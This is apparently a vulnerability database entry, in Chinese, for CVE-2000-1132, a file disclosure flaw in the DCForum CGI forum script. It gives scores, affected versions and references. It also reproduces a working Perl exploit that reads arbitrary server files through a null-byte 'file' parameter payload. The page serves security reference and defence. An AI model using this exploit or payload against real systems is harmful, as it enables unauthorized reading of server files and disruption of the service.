CVE-2000-1132
CVSS6.4
发布时间 :2001-01-09 00:00:00
修订时间 :2008-09-05 16:22:44
NMCOE    

[原文]DCForum cgforum.cgi CGI script allows remote attackers to read arbitrary files, and delete the program itself, via a malformed "forum" variable.


[CNNVD]DCForum cgforum.cgi CG脚本取任意文件且删除程序本身漏洞(CNNVD-200101-065)

        DCForum cgforum.cgi CG脚本存在漏洞。远程攻击者借助畸形的"forum"变量读取任意文件且删除程序本身。

- CVSS (基础分值)

CVSS分值: 6.4 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:dcscripts:dcforum:1.0
cpe:/a:dcscripts:dcforum:6.0
cpe:/a:dcscripts:dcforum:5.0
cpe:/a:dcscripts:dcforum:4.0
cpe:/a:dcscripts:dcforum:2.0
cpe:/a:dcscripts:dcforum:3.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1132
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-1132
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200101-065
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1951
(VENDOR_ADVISORY)  BID  1951
http://archives.neohapsis.com/archives/bugtraq/2000-11/0218.html
(VENDOR_ADVISORY)  BUGTRAQ  20001114 Cgisecurity.com advisory on dcforum
http://www.dcscripts.com/dcforum/dcfNews/124.html#1
(UNKNOWN)  CONFIRM  http://www.dcscripts.com/dcforum/dcfNews/124.html#1
http://xforce.iss.net/xforce/xfdb/5533
(UNKNOWN)  XF  dcforum-cgi-view-files(5533)
http://www.osvdb.org/1646
(UNKNOWN)  OSVDB  1646

- 漏洞信息

DCForum cgforum.cgi CG脚本取任意文件且删除程序本身漏洞
中危 未知
2001-01-09 00:00:00 2005-10-12 00:00:00
远程  
        DCForum cgforum.cgi CG脚本存在漏洞。远程攻击者借助畸形的"forum"变量读取任意文件且删除程序本身。

- 公告与补丁

        

- 漏洞信息 (20405)

DCForum 1-6 Arbitrary File Disclosure Vulnerability (EDBID:20405)
cgi remote
2000-11-14 Verified
0 steeLe
N/A [点击下载]
source : http://www.securityfocus.com/bid/1951/info


DCForum is a commercial cgi script from DCScripts which is designed to facilitate web-based threaded discussion forums.

The script improperly validates user-supplied input, which allows the remote viewing of arbitrary files on the host which are readable by user 'nobody' or the webserver. Additionally, it has been reported that the dcforum.cgi script can be made to delete itself if the attacker attempts to read its source code using this method, effectively permitting a denial-of-service attack.


#!/usr/bin/perl
# DC Forum Vulnerablitiy(Found In Versions From 1.0 - 6.0 According To
CGISecurity.com Advisory)
# Exploits Vulnerability That Allows Remote File Reading
# By SteeLe
# BEGIN { open(STDERR,">errors.txt"); } error checking
$lynx = "/usr/bin/lynx"; # specify

$site = $ARGV[0];
$cgi  = $ARGV[1];
$inet = inet_aton($site);

die "\n\t---   Usage:$0 <site> <cgi location,duh>  ---" if(@ARGV == '0' ||
@ARGV < 2);

print "\n\t---   DCForum 1.0 - 6.0 Exploit ---";
print "\n\t---   By the cool fellas at *   ---\n\n";

while(true) { # yea i think I stole this from the pollex.pl , uh thanks.

print "[dcforum]Option:";
$action = <STDIN>;
chomp($action);

print "Valid Options: r(read files, usage r <file>), q(quit)\n" if($action
ne "r" || $action ne "q");

if ($action eq "r") {
print "\nFile(to read):";
$file = <STDIN>;
chomp($file);
# Old fashion shit, and I was lazy so be happy
$url = "?az=list&file=$file%00";
$site = `$lynx http://$site$cgi$url`;
print $site;
}
elsif ($action eq "q") {
 print "now exiting program\n";
 exit;
  }
}
# (c) 2000 [Warez To Tha Extreme(Damn Thats A Lie)]
		

- 漏洞信息

1646
DCForum dcboard.cgi forum Variable Arbitrary File Disclosure
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Unknown

- 漏洞描述

DCForum contains a flaw that allows a remote attacker to view any arbitrary file on the web server. The issue is due to a lack of sanity checking on the "$r_in" variable in the dcboard.cgi and dcadmin.cgi scripts. Further, if an attacker attempts to view the source code of the dcforum.cgi script, it deletes itself.

- 时间线

2000-11-16 Unknow
2000-11-16 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, the vendor has released a patch to address this vulnerability (contained in the advisory).

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站